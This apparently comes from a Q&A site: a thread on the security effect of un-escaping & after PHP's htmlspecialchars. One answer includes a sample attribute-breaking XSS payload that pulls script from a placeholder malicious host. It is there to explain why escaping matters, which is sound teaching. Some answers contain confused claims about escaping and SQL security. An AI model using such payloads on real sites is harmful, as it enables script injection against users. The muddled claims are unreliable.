Reputation: 2984
I'm currently using the following line in one of my projects:
htmlspecialchars($value,ENT_QUOTES,'UTF-8');
This encodes &, ', ", < and >. My question (which I'm contemplating for internal coding reasons): is there any security risk in not encoding &? In other words, would adding the following line introduce a security risk or leak:
$value = str_replace('&amp;', '&', $value);
For <, >, ' and " it is perfectly clear to me why they should be encoded, as they could be used for HTML injection. For & I don't see a reason (nor have I found one so far).
EDIT:
As database access was mentioned a few times: I'm using Doctrine with parameters, so the database should be (relatively) safe from SQL injection.
The above conversion was made solely to prevent HTML injection, but as most of the data currently lands in fields created by ExtJS, the "&" conversion gets in the way: the text field displays &amp; instead of &.
Sadly, because of an architectural error, I can only do the whole htmlspecialchars and str_replace part at one and only one location (if I do it at all), and there I can't differentiate between output contexts. Hence my question about the &.
Upvotes: 4
Views: 1172
Reputation: 17661
There is a security risk whenever you accept user input and then evaluate it as an expression, output it back to the web page, or inject it directly into a SQL statement. htmlspecialchars encodes some (not all) characters that could be used for nefarious purposes, such as the single and double quotes used in SQL injection attacks. htmlspecialchars shouldn't be used for input security. You should use purpose-built methods for removing, encoding or escaping potentially unsafe characters. There are all kinds of special characters and filter evasion techniques that htmlspecialchars doesn't account for (e.g., IE6 and US-ASCII). Personally, I prefer to remove any special characters if they're not appropriate input (JavaScript to remove non-word characters, i.e. anything other than letters, digits and the underscore: input = input.replace(/\W/g, '');).
It is always important to sanitize/escape your user input (client-side JavaScript checks alone can be bypassed, so repeat them on the server), avoid evaluating user input as expressions, and use prepared statements (e.g., PDO) for SQL actions.
If we could see more of your application, we'd be able to better tell if you have a security issue.
Upvotes: 4
Reputation: 536389
Is there any security risk involved with not encoding &?
There is a security risk for anyone still running a Netscape 4-based browser, where &{...}
in attributes is a backdoor method to run JS. Hopefully you don't have any Netscape users today, but who knows how some wacky future browser might parse malformed HTML...
There is a functionality risk in that escaping & is definitively the right thing for HTML markup, and not escaping it can mangle your output, e.g. markup=cut&copy&paste, output=cut©&paste.
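To make the mangling concrete, here is a minimal sketch of the two code paths from the question. The input string is a hypothetical example, and the str_replace line is assumed to be the workaround the question describes.

```php
<?php
// Hypothetical input containing bare ampersands.
$value = 'cut&copy&paste';

// Full escaping, as in the question.
$escaped = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');

// The workaround under discussion: turn &amp; back into a bare &.
$unescapedAmp = str_replace('&amp;', '&', $escaped);

echo $escaped, PHP_EOL;      // cut&amp;copy&amp;paste
echo $unescapedAmp, PHP_EOL; // cut&copy&paste
```

The first string is displayed by a browser as the original text. The second one leaves &copy in the markup, which is the case described above where the output no longer matches the input.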
currently as most of the data lands in fields created by extJS,... the "&" conversion gets in the way there as in the textfield &amp; is displayed instead of &.
That is a different error - you should find and fix that, rather than trying to work around the problem. How are you creating the fields, and getting the data into the code that creates them?
If you are injecting values into JavaScript variables then you need to be JS-escaping them, not HTML-escaping them; the two contexts require different handling. A potential workaround is to hide data in the document HTML content (commonly in data-
attributes) and read it from there in JS.
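As a rough illustration of the two contexts, the sketch below encodes the same value once for a JavaScript variable and once for a data- attribute. The value, the variable name title, the element id and the attribute name data-title are all hypothetical; json_encode with the JSON_HEX_* flags is one common way to JS-escape in PHP, not necessarily what this application should use.

```php
<?php
// Hypothetical value that has to reach client-side code.
$value = 'Tom & Jerry </script>';

// JavaScript context: encode as a JSON string literal. The JSON_HEX_*
// flags emit <, >, &, ' and " inside the string as \uXXXX escapes, so
// the literal cannot terminate the surrounding <script> element.
$jsLiteral = json_encode(
    $value,
    JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
);

// HTML attribute context: HTML-escape, including the ampersand.
$attrValue = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');

echo '<script>var title = ' . $jsLiteral . ';</script>', PHP_EOL;
echo '<div id="field" data-title="' . $attrValue . '"></div>', PHP_EOL;
```

With the data- attribute variant, the browser decodes the entities while parsing the HTML, so script code reading the attribute gets the raw text back without any extra unescaping step.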
Upvotes: 2
Reputation: 198324
htmlspecialchars doesn't have anything to do with security, but with the HTML specification, which says that those characters are special. For security, there are other kinds of escapes - specifically, the important one is the escaping that happens right before things are inserted into a database, but that's not what htmlspecialchars is used for.
You would use htmlspecialchars
whenever you want to output HTML text, such as
<div id="here" class='here'> or here </div>
The reason for this is that if the first here
contained a literal quote, you'd get a syntax error in your HTML; same with the second here
and the double quote, or third here
and a less-than symbol. Greater-than symbol is not as dangerous, I think, but is replaced for balance (someone correct me if I'm wrong). Ampersand is replaced so that if someone wanted to display the literal text &quot;, not escaping it would display " instead. When you properly htmlspecialchars it, you will get &amp;quot; in HTML, which will render as the desired &quot;.
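A small sketch of the ampersand case, assuming the text to display is the literal six-character string &quot; (a hypothetical example value). htmlspecialchars_decode stands in here for the single decoding pass a browser performs when rendering.

```php
<?php
// The author wants the reader to see the six characters &quot; on the page.
$text = '&quot;';

// Escaping turns the leading ampersand into &amp;.
$html = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
echo $html, PHP_EOL; // &amp;quot;

// Decoding once, roughly what a browser does when rendering,
// gives the intended text back.
$rendered = htmlspecialchars_decode($html, ENT_QUOTES);
echo $rendered, PHP_EOL; // &quot;
```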
As Blender says, it's so that text looks like you want it to. Nothing to do with security.
EDIT: Or rather, it could have to do with HTML security (just occurred to me). Say someone replaced the first here
with "><script src="http://malicio.us/code"/><p id="
... If it was properly escaped, nothing happens, it's just that weird piece of text inside the attribute. But if not... Still, nothing to do with SQL security, at least.
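The attribute case can be sketched as follows, using the payload from the paragraph above. The surrounding div markup and the variable names are assumptions made for illustration.

```php
<?php
// Payload from the example above, supplied where an id value was expected.
$payload = '"><script src="http://malicio.us/code"/><p id="';

// Unescaped: the quote closes the attribute and the script tag becomes markup.
$unsafe = '<div id="' . $payload . '">';

// Escaped: the whole payload stays inside the attribute value as plain text.
$safe = '<div id="' . htmlspecialchars($payload, ENT_QUOTES, 'UTF-8') . '">';

echo $unsafe, PHP_EOL;
echo $safe, PHP_EOL;
```

In the escaped version the quotes and angle brackets appear as &quot;, &lt; and &gt;, so the browser never sees a script element.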
Upvotes: 1